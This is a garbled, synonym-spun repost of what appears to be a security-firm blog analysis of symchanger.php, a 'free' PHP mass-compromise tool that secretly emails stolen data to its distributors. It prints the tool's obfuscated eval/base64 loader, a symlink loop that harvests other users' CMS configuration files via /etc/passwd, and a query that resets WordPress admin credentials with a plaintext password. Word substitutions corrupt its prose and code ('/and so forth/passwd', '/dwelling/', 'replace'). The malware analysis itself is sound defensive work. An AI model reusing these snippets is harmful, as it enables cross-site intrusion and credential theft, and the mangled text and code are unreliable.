Home php “Free” Symchanger Malware Tricks Users Into Installing Backdoor

“Free” Symchanger Malware Tricks Users Into Installing Backdoor

10 min read

In a earlier put up, I mentioned how attackers can trick web site homeowners into putting in malware onto an internet site — granting the attacker the identical unauthorized entry as if they’d exploited a vulnerability or compromised login particulars for the web site.

However do you know attackers use the identical tactic in opposition to different unhealthy actors? They do that by providing free malware, even going to nice lengths to incorporate a information on the right way to use it. This will sound like a superb deal to unsuspecting customers, however individuals downloading these free instruments is perhaps unaware that the malware itself is backdoored.

Mass Compromise Device: symchanger.php

This mass compromise device, a PHP file named symchanger.php, was discovered promoted on a Fb group together with a hyperlink to its tutorial video.

It’s primarily simply PHP code taken from present malware with some backdoors added by the attacker, who provides it for “free.”

Obfuscation Strategies

Once you open the downloaded malicious PHP file, you possibly can instantly inform that the code is obfuscated:

<?php /*** PHP Encode v1.0 by zeura[dot]com ***/ $XnNhAWEnhoiqwciqpoHH=file(__FILE__);eval(base64_decode("aWYoIWZ1bmN0aW9uX2V4aXN0cygiWWl1bklVWTc2YkJodWhOWUlPOCIpKXtmdW5jdGlvbiBZaXVuSVVZNzZiQmh1aE5ZSU84KCRnLCRiPTApeyRhPWltcGxvZGUoIlxuIiwkZyk7JGQ9YXJyYXkoNjU1LDIzNiw0MCk7aWYoJGI9PTApICRmPXN1YnN0cigkYSwkZFswXSwkZFsxXSk7ZWxzZWlmKCRiPT0xKSAkZj1zdWJzdHIoJGEsJGRbMF0rJGRbMV0sJGRbMl0pO2Vsc2UgJGY9dHJpbShzdWJzdHIoJGEsJGRbMF0rJGRbMV0rJGRbMl0pKTtyZXR1cm4oJGYpO319"));eval(base64_decode(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH)));eval(ZsldkfhGYU87iyihdfsow(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,2),YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,1)));__halt_compiler();aWYoIWZ1bmN0aW9uX2V4aXN0cygiWnNsZGtmaEdZVTg3aXlpaGRmc293Iikpe2Z1bmN0aW9uIFpzbGRrZmhHWVU4N2l5aWhkZnNvdygkYSwkaCl7aWYoJGg9PXNoYTEoJGEpKXtyZXR1cm4oZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoJGEpKSk7fWVsc2V7ZWNobygiRXJyb3I6IEZpbGUgTW9kaWZpZWQiKTt9fX0

The obfuscation makes use of a couple of completely different layers and file code checks in the course of the execution, so it’s not as straightforward to deobfuscate as textual content that’s simply encoded and compressed (e.g gzinflate(base64_decode().

After deobfuscating the code, we see that the title symchanger.php is becoming for this malware. It makes use of the favored symlink methodology to shortly cross-contaminate web sites which are hosted underneath the identical consumer because the compromised web site.

To perform cross-contamination, the device searches for identified configuration file names (on this case WordPress, Joomla, Drupal, and WHMCS). If one is detected, a symlink to a .txt file is generated. The txt file extension is used in order that the file might be downloaded as a substitute of run as a PHP file.

If the malware can entry to /and so forth/passwd (some hosts restrict it), then it is going to learn the file contents to get an inventory of all present customers on the net server. From there, it simply performs a foreach loop to undergo all the customers and acquire their credentials.

                foreach ($dir as $customers) {
                    $consumer = explode(":", $customers);
                    foreach ($record as $confurl) {
                        symlink("/dwelling/" . $consumer[0] . "/public_html/" . $confurl, $consumer[0] . "~" . $confurl . ".txt");
                        symlink("/home1/" . $consumer[0] . "/public_html/" . $confurl, $consumer[0] . "~" . $confurl . ".txt");
                        symlink("/home2/" . $consumer[0] . "/public_html/" . $confurl, $consumer[0] . "~" . $confurl . ".txt");

As soon as it has established the symlinks to the related configuration information, the malware reads the SQL connection data and connects to the database,  inserting a malicious admin consumer into any particular person databases it might efficiently connect with:

$query2 = mysqli_query($join, "replace " . $prefix . "customers set user_login='Admin',user_pass="c7433bf0630d8def04ad22c9f5308783"");
if ($query2)
    echo "$siteeurl|Admin|Beast3x@8*#4@!<br>";

Within the promotional video for this symchanger.php malware, the distributor exhibits the angle of the attacker, loading the symchanger.php file on the compromised web site.

When the script finishes, outcomes are displayed for web site login web page URLs that had malicious admin customers added, clearly displaying the efficacy of the cross-contamination characteristic:

Cross-contamination feature

Cellphone Residence Emails

If an unsuspecting consumer doesn’t deobfuscate and browse the malware’s PHP code, it merely seems that this malware solely advantages the consumer that runs it.

What’s much less obvious, nevertheless, is that the PHP script additionally silently makes use of the compromised internet server to ship out 5 separate emails to a number of electronic mail addresses. The contents of those emails include delicate knowledge, together with the URL to the symchanger.php file that was run, the listing itemizing, stolen credentials, and extra.

 #exim -bp
 0m  2.1K 1jy3is-001yEF-1W <www-knowledge@localhost.localdomain>

 0m  2.1K 1jy3is-001yEI-76 <www-knowledge@localhost.localdomain>

 0m  2.1K 1jy3is-001yEL-Ch <www-knowledge@localhost.localdomain>

 0m   551 1jy3is-001yEO-IH <www-knowledge@localhost.localdomain>

The a number of emails in queue earlier than sending out to the backdoor controllers

This conveniently supplies electronic mail recipients with unauthorized entry to web sites that had been compromised with the symchanger.php device — and considerably reduces the quantity of heavy lifting on their finish. As an alternative of hacking an internet site, all the e-mail recipient must do is test their electronic mail tackle and look ahead to the stolen data to roll in from others utilizing the mass compromise device.


The lure of free software program is usually sufficient for a lot of customers to ignore safety dangers and willingly run code from doubtful origins, making this trojan horse-style tactic standard with unhealthy actors.

Fortunately, our monitoring instruments are in a position to detect and clear the mass an infection malware that symchanger.php relies on, however we propose studying up on the right way to stop cross web site contamination within the first place — and observe web site safety greatest practices to mitigate danger.

Leave a Reply

Your email address will not be published. Required fields are marked *

Check Also

Defoe’s ‘A Journal of the Plague Year’ is all too familiar

In case you are a author aiming to observe our governor’s lead with one other new e-book i…